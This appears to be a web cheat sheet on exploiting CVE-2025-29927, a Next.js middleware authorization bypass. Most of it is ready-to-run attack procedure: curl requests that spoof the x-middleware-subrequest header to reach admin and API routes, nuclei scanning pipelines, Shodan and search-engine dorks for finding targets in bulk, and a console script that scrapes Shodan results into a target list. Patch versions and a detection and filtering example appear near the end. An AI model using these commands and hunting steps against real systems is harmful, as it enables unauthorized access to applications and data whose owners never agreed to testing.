Next.js Middleware Bypass
CVE-2025-29927 - Authorization bypass via x-middleware-subrequest
Middleware in Next.js intercepts incoming HTTP requests and processes them before they reach the final route handler. It is commonly used for authentication & authorization (checking if a user is logged in), logging & monitoring (tracking requests for analytics), and request modification (altering headers or query parameters).
Pro Tips
- Middleware runs before any route handler is executed
- It can modify requests, responses, or even block access entirely
- Common use cases: authentication checks, rate limiting, A/B testing, and analytics
CVE-2025-29927 is a critical authorization bypass vulnerability in Next.js middleware. By sending a specially crafted header, an attacker can skip every check the middleware performs and reach routes it was supposed to protect.
Commands
import { NextResponse } from 'next/server';

// Example middleware that gates a route on a session cookie. This is the check
// that the spoofed header lets a request skip on unpatched versions.
// Uses the Next.js 13+ cookies API (req.cookies.get) rather than a plain object.
export function middleware(req) {
  if (!req.cookies.get('token')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}

curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboard
Pro Tips
- The vulnerability allows bypassing ALL middleware checks
- Affected versions: Next.js 12.x < 12.3.5, 13.x < 13.5.9, 14.x < 14.2.25, 15.x < 15.2.3
- Impact: unauthorized data access, privilege escalation, application takeover
Before exploiting, you need to identify whether the target is running Next.js and has middleware in place. Use nuclei templates or manual probing.
Commands
echo target.com | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
subfinder -d target.com -all | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
cat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
Pro Tips
- Look for Next.js patterns in responses: x-powered-by, _next/static
- Check for the x-middleware-rewrite header in responses
- Test manually if automated tools fail
Once you've identified a vulnerable target, exploit the authorization bypass to access protected routes. The vulnerability works by spoofing the x-middleware-subrequest header: Next.js sets it internally to mark requests that middleware itself issues so the middleware is not run again, and affected versions trusted that header even when it arrived on an external request, so the middleware was skipped.
Commands
curl -v https://target.com/dashboard
curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboard
curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/api/admin
curl -H "x-middleware-subrequest: middleware:middleware:middleware" -H "Cookie: session=valid" https://target.com/admin
Pro Tips
- A 200 OK on a route that is otherwise gated means the bypass worked; a 307 redirect may still indicate a vulnerable target
- Try multiple endpoints - admin, dashboard, API routes
- Use Burp Suite for easier testing and response analysis
Burp Suite provides a graphical interface for testing the vulnerability. Add the header to intercepted requests and modify them from the proxy.
Commands
x-middleware-subrequest: middleware:middleware:middleware:middleware
Enable Proxy > Options > Match and Replace > Add header
Pro Tips
- Use Burp's Match & Replace to automatically add the header
- Easy to test multiple requests without manual curl commands
- Capture and analyze all responses in one place
For mass hunting, use Shodan to find servers potentially running vulnerable Next.js. Search for the x-middleware-rewrite header which indicates Next.js is in use.
Commands
x-middleware-rewrite
http.html:"/_next/static"
cpe:"cpe:2.3:a:zeit:next.js"

// Browser-console script for the Shodan results page: collects IPs and domains
// from <strong> elements and downloads them as domains.txt
var ipElements = document.querySelectorAll('strong'), ips = [], domains = [];
ipElements.forEach(function (e) {
  var t = e.innerHTML.replace(/['"]/g, '').trim();
  if (/^(\d{1,3}\.){3}\d{1,3}$/.test(t)) {
    ips.push(t);
  } else if (/^(?!\d+\.)[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(t)) {
    domains.push(t);
  }
});
var dataString = 'IPs:\n' + ips.join('\n') + '\n\nDomains:\n' + domains.join('\n'),
  a = document.createElement('a');
a.href = 'data:text/plain;charset=utf-8,' + encodeURIComponent(dataString);
a.download = 'domains.txt';
document.body.appendChild(a);
a.click();

cat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yaml
Pro Tips
- Shodan returns ~15,000 results for x-middleware-rewrite
- Use domain filter for cleaner results
- Automate extraction with console script shown above
Use these dorks to discover potentially vulnerable Next.js applications through search engines.
Commands
shodan query: x-middleware-rewrite
shodan query: http.html:"/_next/static"
fofa: body="/_next/static" AND "x-middleware-rewrite"
google: inurl:"/_next" AND intext:"next.config.js" OR intext:"Powered by Next.js"
inurl:"/_next" AND intext:"next.config.js"
Pro Tips
- Combine multiple search engines for better coverage
- Look for specific Next.js patterns in URLs
- Test discovered targets with nuclei or manual curl
This vulnerability has critical impact as it allows unauthorized access to any route protected by middleware. In severe cases, attackers can compromise the entire application.
- Unauthorized Data Access: View private user information
- Privilege Escalation: Gain administrative access without credentials
- Application Takeover: Complete compromise in severe cases
Pro Tips
- Always check ALL protected routes, not just obvious ones
- API endpoints often contain sensitive data
- Report to bug bounty programs for rewards
Next.js has released patches for all affected versions. Update to the latest version to remediate this vulnerability.
- Next.js 15.x: Upgrade to 15.2.3 or later
- Next.js 14.x: Upgrade to 14.2.25 or later
- Next.js 13.x: Upgrade to 13.5.9 or later
- Next.js 12.x: Upgrade to 12.3.5 or later
Pro Tips
- Always keep Next.js updated to the latest version
- Check package.json for current version
- Consider rate limiting as an additional mitigation
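Beyond upgrading, the vendor advisory's interim mitigation is to keep external requests that carry x-middleware-subrequest from reaching the application. The following is an added example, not code from this page or from Next.js, of that filter as it would sit in an edge proxy, plus a helper that reviews access logs for past attempts; the JSON log format and the sample lines are constructed.

```javascript
const INTERNAL_HEADER = 'x-middleware-subrequest';
// Edge filter: Next.js sets this header only on its own internal sub-requests,
// so a copy arriving from a client should never be forwarded to the app.
// Returns the cleaned header map and whether anything was stripped.
function filterInbound(headers) {
  const forwarded = {};
  let stripped = null;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === INTERNAL_HEADER) {
      stripped = String(value);
      continue;
    }
    forwarded[name] = value;
  }
  return { headers: forwarded, suspicious: stripped !== null, value: stripped };
}

// Log review: parse JSON access-log lines (constructed format with ip, path,
// status and a headers map) and report every request that carried the header.
// A 2xx on a gated route means the bypass actually succeeded.
function findBypassAttempts(logLines) {
  const hits = [];
  for (const line of logLines) {
    let entry;
    try { entry = JSON.parse(line); } catch { continue; }
    const hdrs = entry.headers || {};
    const key = Object.keys(hdrs).find((k) => k.toLowerCase() === INTERNAL_HEADER);
    if (!key) continue;
    // Colon-separated list; repeated names are the signature of the public PoC.
    const repeats = String(hdrs[key]).split(':').filter(Boolean).length;
    hits.push({
      ip: entry.ip,
      path: entry.path,
      status: entry.status,
      repeats,
      succeeded: entry.status >= 200 && entry.status < 300,
    });
  }
  return hits;
}

// Constructed sample log lines so the block runs stand-alone.
const SAMPLE_LOG = [
  '{"ip":"203.0.113.7","path":"/dashboard","status":200,"headers":{"x-middleware-subrequest":"middleware:middleware:middleware"}}',
  '{"ip":"203.0.113.7","path":"/dashboard","status":307,"headers":{}}',
  '{"ip":"198.51.100.2","path":"/api/admin","status":401,"headers":{"X-Middleware-Subrequest":"middleware"}}',
  'not a json line',
];
console.log(findBypassAttempts(SAMPLE_LOG));
```

Header matching is case-insensitive because proxies and clients vary the casing; the filter strips the header rather than rejecting the request outright, so a misconfigured internal hop does not turn into an outage.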
Impact Assessment
- Unauthorized access to protected routes and sensitive data
- Privilege escalation to admin-level access
- Potential complete application compromise
For educational and authorized testing purposes only. Always obtain proper authorization before testing.